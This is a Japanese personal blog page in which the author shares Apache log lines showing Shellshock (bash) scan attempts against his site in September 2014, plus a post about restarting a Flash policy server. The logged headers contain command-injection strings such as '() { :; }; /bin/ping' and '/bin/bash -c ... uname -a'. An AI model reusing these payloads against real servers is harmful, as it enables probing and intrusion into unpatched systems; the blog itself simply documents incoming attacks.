スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

bashの脆弱性(続き)

昨日に続いて、さらに攻撃らしいアクセスがありました。


118.192.48.6 - - [27/Sep/2014:21:05:16 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 301 "http://www.baidu.com" "() { :; }; echo X-Bash-Test: `echo qemzPlJGpn`;"
118.192.48.6 - - [27/Sep/2014:21:37:41 +0900] "GET /cgi-bin/count.cgi HTTP/1.1" 404 292 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo tZl2Wm91Bv`;"
118.192.48.6 - - [27/Sep/2014:21:37:41 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 404 291 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo GfaFQMxEAI`;"
118.192.48.6 - - [27/Sep/2014:21:37:41 +0900] "GET /cgi-bin/help.cgi HTTP/1.1" 404 291 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo RE7LJC2S9o`;"
118.192.48.6 - - [27/Sep/2014:21:37:41 +0900] "GET /cgi-bin/index.cgi HTTP/1.1" 404 292 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo HukIfCQewT`;"


baiduを名乗っていますが、どこからかわかりませんね。
なんか、cgiの入門の勉強をして放置してあるのを狙っている感じですね。
echo Mozillaをしてどうするんでしょうかね?
スポンサーサイト

bashの脆弱性

いま話題になっているbashの脆弱性ですが、
うちのサイトにも調査やら攻撃やらそれらしいアクセスがありました。


209.126.230.72 - - [25/Sep/2014:08:27:03 +0900] "GET / HTTP/1.0" 200 27471 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:16:26:23 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 301 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [26/Sep/2014:04:16:59 +0900] "GET / HTTP/1.1" 200 38 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
54.251.83.67 - - [26/Sep/2014:17:39:34 +0900] "GET / HTTP/1.1" 200 38 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"


うちのサイトでは、bashを直接、間接呼び出すことはない(はず)なので、大丈夫だったと思いますが、
bashはupdateしておきました。
こわいですね。

いつの間にかチャットができなくなってた

久々に、チャットが動くかどうか調べようとして
適当な部屋に入ってみたのですが、接続しません。。。。
chatserverがおかしくなったのかと思って、chatserverを再起動したのですが
変化はありませんでした。
そこでflashpolicyのプロセス(FLASHからconnectするにはポート843を空けておいて、
一度そこのポートに接続してからでないとFLASHからconnectできない)
を再起動してみると、接続できるようになりました。
原因はわかりませんが、このプロセスは2012年からずっと動いていたようで、
何かリソースでも食いつぶしたんですかね。

プロフィール

chattera.net

Author:chattera.net
フリーでソフト開発の仕事をしています。
自作したこのチャットシステムは、何か世の中に役に立つこともあるかと思いますので、お呼びがかかるとうれしいですね。

連絡先は chatteranet@gmail.com です。

また、ソフト開発関連のお誘いもうけたまわっております。

最新記事
最新コメント
最新トラックバック
月別アーカイブ
カテゴリ
検索フォーム
RSSリンクの表示
リンク
ブロとも申請フォーム

この人とブロともになる

QRコード
QR
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。